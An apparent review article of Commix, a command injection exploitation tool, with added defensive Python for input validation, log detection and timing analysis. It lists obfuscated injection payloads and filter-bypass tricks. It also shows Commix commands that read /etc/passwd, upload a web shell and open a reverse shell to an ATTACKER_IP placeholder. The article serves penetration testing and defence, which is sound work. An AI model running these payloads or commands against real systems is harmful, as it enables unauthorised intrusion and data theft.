Commix: Automating Command Injection Exploitation with Polymorphic Payloads

Hook

While most security scanners stop at detecting command injection vulnerabilities, Commix starts there—automatically escalating to reverse shells, file exfiltration, and privilege escalation without manual intervention.

Context

Command injection remains one of the most devastating web application vulnerabilities, consistently appearing in OWASP's Top 10. When user input flows unchecked into system calls—whether through exec(), shell_exec(), or similar functions—attackers can execute arbitrary operating system commands. The traditional approach to testing for these vulnerabilities involves manually crafting payloads, analyzing responses, dealing with blind injection scenarios, and then separately attempting exploitation. This process is tedious, error-prone, and time-consuming, especially when dealing with multiple parameters across large applications.
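To make the sink concrete, here is the same "ping a host" feature written once the vulnerable way and once hardened. This is an added example, not code from the article or from the Commix project; the function names, the hostname allow-list regex and the sample tainted value are my own.

```python
# Added example, not code from the article or from the Commix project:
# the same "ping a host" feature written the vulnerable way and the
# hardened way. Function and variable names are my own.
import re
import subprocess

# Vulnerable pattern: the request parameter is concatenated into a
# command line that a shell will parse (os.system, subprocess with
# shell=True, PHP shell_exec, ...). Any shell metacharacter in `host`
# becomes shell syntax.
def ping_command_vulnerable(host: str) -> str:
    return "ping -c 1 " + host


# Hardened pattern, step 1: a strict allow-list for the one thing the
# parameter is supposed to be (an RFC 1123 style hostname or an IPv4
# address). Anything else is rejected, so separators, backticks, $( ),
# ${IFS} and backslashes never reach a command at all.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")


def validate_host(host: str) -> str:
    if len(host) > 253 or not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return host


# Hardened pattern, step 2: pass the arguments as a list. No shell is
# involved, so the value is a single argv element even if validation
# were ever loosened.
def ping_argv_hardened(host: str) -> list:
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host: str) -> int:
    """Run the hardened command; returns ping's exit status."""
    result = subprocess.run(ping_argv_hardened(host), capture_output=True, timeout=10)
    return result.returncode


SHELL_METACHARS = set(";|&`$(){}\n")


def contains_shell_metachar(s: str) -> bool:
    """True if the string carries characters a shell would interpret."""
    return any(c in SHELL_METACHARS for c in s)


if __name__ == "__main__":
    tainted = "127.0.0.1; whoami"   # constructed tainted parameter value
    print("vulnerable builds:", repr(ping_command_vulnerable(tainted)))
    try:
        ping_argv_hardened(tainted)
    except ValueError as exc:
        print("hardened rejects:", exc)
    print("hardened argv:", ping_argv_hardened("example.com"))
```

The two hardening steps are independent on purpose: the allow-list stops the tainted value at the boundary, and the argv list means that even a value which slipped past validation is handed to ping as data, not parsed by a shell.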

Commix emerged to automate this entire workflow. Unlike general-purpose web scanners that simply flag potential issues, Commix is purpose-built for the complete command injection lifecycle: detection through exploitation to post-exploitation. It's designed for penetration testers and bug bounty hunters who need to move quickly from "I think this parameter is vulnerable" to "I have a shell and here's what I can access." The tool recognizes that command injection testing isn't just about finding the vulnerability—it's about proving impact, which often makes the difference between a low-severity report and a critical finding.

Technical Insight

System architecture (auto-generated diagram; only its node labels survived extraction): HTTP Request Handler -> Parameter Injection Point -> Payload Generator, which produces Payload Variations for four techniques (Classic Results-Based, Eval-Based Injection, Time-Based Blind, File-Based Semiblind), each checked in the Detection Phase by a Response Analyzer, a Timing Analyzer or a File Access Checker. A decision node, "Injection Successful?" (Yes/No), gates the Exploitation Module (WAF/Filter Bypass, Command Execution, File Operations, Privilege Escalation, Reverse Shell, System Enumeration) and Post-Exploitation.

Commix's architecture revolves around four distinct injection techniques, each designed to handle different response scenarios. The classic results-based technique works when command output appears directly in the HTTP response. Eval-based injection targets dynamic code evaluation contexts in languages like PHP or Python. Time-based blind injection uses sleep commands and response timing analysis when no direct output is visible. Finally, file-based semiblind injection writes command output to web-accessible files, useful when responses are sanitized but the filesystem is accessible.

The tool's effectiveness comes from its payload polymorphism. Instead of sending a single test payload, Commix automatically generates variations with different separators, encoding schemes, and bypass techniques. Consider this example of how Commix might test a simple parameter:

# Example payload variations Commix generates for a single test
payloads = [
    ";whoami",           # Classic separator
    "| whoami",          # Pipe separator
    "&& whoami",         # AND operator
    "`whoami`",          # Backtick execution
    "$(whoami)",         # Command substitution
    r";w\h\o\a\m\i",     # Backslash obfuscation (raw string keeps the literal backslashes)
    ";who''ami",         # Empty string bypass
    ";${IFS}whoami",     # IFS variable for space
    ";who$()ami",        # Inline command bypass
]

# For blind injection, timing-based verification
blind_payload = ";sleep${IFS}5"
# Commix measures response time delta to confirm execution
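The flip side of payload polymorphism is that a detector which only matches the literal string "whoami" misses most of the list above. The following log-side detector is an added example, not code from the article or the Commix project: it normalises the same obfuscations (${IFS}, '' and $() splicing, backslash escaping, URL encoding) before matching, so the variants collapse to one alert. The Apache-style log lines, the regexes and all names are constructed for the example.

```python
# Added example, not code from the article or the Commix project: a
# log-side detector for the payload shapes listed above. It normalises
# the obfuscations (${IFS}, '' and $() splicing, backslash escaping,
# URL encoding) before matching, so the variants collapse to the same
# alert. Log lines, regexes and names are constructed for the example.
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE) (\S+) HTTP/')
SEPARATOR_RE = re.compile(r"(;|\|\||\||&&|&|`|\$\(|\n)")
COMMAND_RE = re.compile(r"\b(whoami|sleep|id|uname|cat|nc|bash|sh|curl|wget|ping|echo)\b")
# Obfuscation tricks to record in the decoded (but not yet normalised) value.
OBFUSCATION_MARKERS = ("${ifs}", "''", '""', "$()", "\\")

# Constructed Apache-style access log: benign traffic plus the payload
# variants from the article, URL-encoded as a client would send them.
LOG_LINES = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /page?id=1%3Bwhoami HTTP/1.1" 200 530',
    '10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "GET /page?id=1%3B%24%7BIFS%7Dwhoami HTTP/1.1" 200 530',
    '10.0.0.5 - - [10/Oct/2023:13:55:39 +0000] "GET /page?id=1%3Bwho%27%27ami HTTP/1.1" 200 530',
    '10.0.0.5 - - [10/Oct/2023:13:55:41 +0000] "GET /page?id=1%3Bsleep%24%7BIFS%7D5 HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Oct/2023:13:56:00 +0000] "GET /search?q=fish+%26+chips HTTP/1.1" 200 2048',
    '10.0.0.8 - - [10/Oct/2023:13:56:10 +0000] "GET /page?id=1%3Bw%5Ch%5Co%5Ca%5Cm%5Ci HTTP/1.1" 200 530',
]


def normalize(value: str) -> str:
    """Undo the cheap transformations a payload can hide behind."""
    v = unquote_plus(value).lower()            # second decode catches double URL encoding
    v = v.replace("${ifs}", " ")               # ${IFS} is a space to the shell
    v = v.replace("''", "").replace('""', "")  # who''ami -> whoami
    v = v.replace("$()", "")                   # who$()ami -> whoami
    return v.replace("\\", "")                 # w\h\o\a\m\i -> whoami


def analyze_request(line: str) -> list:
    """Return one finding per query parameter that looks like a command injection."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    findings = []
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        markers = [k for k in OBFUSCATION_MARKERS if k in value.lower()]
        norm = normalize(value)
        sep, cmd = SEPARATOR_RE.search(norm), COMMAND_RE.search(norm)
        # Require both a separator and a known command name: "fish & chips"
        # has a separator but no command, so it is not flagged.
        if sep and cmd:
            findings.append({
                "client": line.split(" ", 1)[0],
                "param": name,
                "separator": sep.group(1),
                "command": cmd.group(1),
                "obfuscation": markers,
                "normalized": norm,
            })
    return findings


def scan_log(lines) -> list:
    """Run analyze_request over every line and flatten the findings."""
    alerts = []
    for line in lines:
        alerts.extend(analyze_request(line))
    return alerts


if __name__ == "__main__":
    for a in scan_log(LOG_LINES):
        print(f"{a['client']} param={a['param']} cmd={a['command']} "
              f"sep={a['separator']!r} obfuscation={a['obfuscation']}")
```

Requiring a separator and a command name together keeps ordinary values such as "fish & chips" out of the alert stream, while the recorded obfuscation markers tell an analyst that the sender was deliberately evading filters rather than mistyping.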

What makes Commix particularly sophisticated is its response analysis engine. For time-based blind injection, it doesn't simply check if a response took longer—it establishes a baseline by sending benign requests, then calculates statistical significance of timing differences. This reduces false positives from network jitter or server load variations.
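The baseline-then-probe logic is easier to reason about as code. The routine below is an added example and not the Commix project's own implementation (which the article does not show); it is a deliberately simple version that also handles the case the Gotcha section raises later, a baseline too noisy to support any conclusion. The sample timings and the thresholds (three sigma, half the requested delay, a 50% coefficient-of-variation cap) are my own choices.

```python
# Added example, not the Commix project's code: the shape of a
# baseline-then-probe timing check, written to show why a noisy
# baseline must yield "inconclusive" rather than a false positive.
# Sample timings are constructed; thresholds are my own choices.
from statistics import mean, stdev


def timing_verdict(baseline, probes, expected_delay, min_sigma=3.0, max_cv=0.5):
    """
    baseline: response times (seconds) of benign requests to the endpoint
    probes: response times of requests carrying a sleep-style payload
    expected_delay: the delay (seconds) the payload asked for
    Returns "confirmed", "not-confirmed" or "inconclusive".
    """
    if len(baseline) < 3 or not probes:
        raise ValueError("need at least 3 baseline samples and 1 probe")
    mu, sigma = mean(baseline), stdev(baseline)
    # A baseline whose spread is a large fraction of its mean (cold
    # starts, autoscaling, noisy neighbours) cannot separate a requested
    # sleep from ordinary variance; refuse to decide rather than guess.
    if mu > 0 and sigma / mu > max_cv:
        return "inconclusive"
    # A probe counts only if it exceeds the baseline by several sigma AND
    # by at least half the requested delay, so one slow response caused
    # by network jitter is not enough on its own.
    threshold = mu + max(min_sigma * sigma, 0.5 * expected_delay)
    hits = sum(1 for p in probes if p >= threshold)
    return "confirmed" if hits == len(probes) else "not-confirmed"


# Constructed samples (seconds).
STEADY_BASELINE = [0.21, 0.19, 0.23, 0.20, 0.22]
DELAYED_PROBES = [5.24, 5.19, 5.30]              # every probe carries the 5 s delay
JITTERY_PROBES = [0.90, 0.50, 2.00]              # slow, but nowhere near 5 s
NOISY_BASELINE = [0.20, 3.10, 0.40, 2.80, 0.30]  # cold-start style variance

if __name__ == "__main__":
    print(timing_verdict(STEADY_BASELINE, DELAYED_PROBES, 5))   # confirmed
    print(timing_verdict(STEADY_BASELINE, JITTERY_PROBES, 5))   # not-confirmed
    print(timing_verdict(NOISY_BASELINE, DELAYED_PROBES, 5))    # inconclusive
```

From the defender's side the same structure is the giveaway: a burst of otherwise identical requests to one endpoint, followed by requests whose response time jumps by a round number of seconds, is a pattern worth alerting on in its own right.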

The post-exploitation module is where Commix truly differentiates itself from basic vulnerability scanners. Once a vulnerable parameter is confirmed, you can invoke built-in commands for file operations, reverse shells, or system enumeration. For example, after detecting a vulnerability, you might use:

# Enumerate system information
commix --url="http://target.com/page?id=1" --os-cmd="uname -a"

# Read sensitive files
commix --url="http://target.com/page?id=1" --file-read="/etc/passwd"

# Upload a web shell
commix --url="http://target.com/page?id=1" --file-upload="shell.php" --file-dest="/var/www/html/"

# Attempt to establish a reverse shell
commix --url="http://target.com/page?id=1" --reverse-tcp="ATTACKER_IP:4444"

Under the hood, these operations chain multiple commands together, handling edge cases like restricted character sets or limited output buffers. For file reading, Commix might break large files into chunks, base64-encode them to avoid binary data issues, and reassemble them client-side.

The WAF bypass mechanisms deserve special attention. Commix includes techniques like case variation (WhoAmI vs whoami), hex encoding, Unicode normalization, and parameter pollution. It can also insert junk data between command separators that gets ignored by bash but confuses pattern-matching WAF rules. This is particularly effective against signature-based security appliances that look for exact payload matches.

The tool's session management is another architectural strength. Commix maintains a SQLite database of discovered injection points, successful payloads, and exploitation history. This allows resuming interrupted tests and prevents redundant testing of the same parameters with identical techniques. For large-scale bug bounty work or comprehensive penetration tests, this persistence saves significant time.

Gotcha

Commix's automated approach creates noise that's impossible to hide. Each injection technique requires multiple requests with obvious attack signatures—sleep commands, file write attempts, whoami executions. If your target has competent logging or an active SOC team, you'll be detected quickly. This makes Commix unsuitable for red team operations requiring stealth or scenarios where you need to avoid triggering incident response procedures.

The tool also struggles with modern application architectures. Single-page applications that heavily use JSON APIs, GraphQL endpoints, or WebSocket communication aren't well-supported by Commix's traditional HTTP parameter testing approach. Similarly, applications built with frameworks that have strong input validation by default (like Django with proper form handling or Rails with parameter sanitization) often render Commix ineffective. You'll spend time watching it cycle through payloads that have no chance of succeeding because the framework strips dangerous characters at a layer Commix can't easily bypass. In these cases, manual analysis to understand the specific input validation logic is far more efficient than automated fuzzing. Additionally, Commix's time-based blind injection can produce unreliable results in containerized or serverless environments where response times vary significantly based on cold starts, auto-scaling events, or shared resource contention.

Verdict

Use if: You're conducting time-boxed penetration tests or bug bounty hunting where you need to quickly validate command injection vulnerabilities across multiple parameters and immediately demonstrate exploitation impact. Commix excels when testing legacy applications, custom frameworks without robust input validation, or any scenario where proving RCE matters more than stealth. It's particularly valuable when you have limited time and need to maximize coverage: let it run while you focus on other attack vectors.

Skip if: You're performing red team operations requiring operational security, testing modern web frameworks with strong default protections, working with non-traditional architectures like GraphQL or WebSockets, or need compliance-friendly tools for production security scanning. Also skip it when you've already identified the injection mechanism through manual testing; at that point, custom exploitation scripts give you better control and less noise.
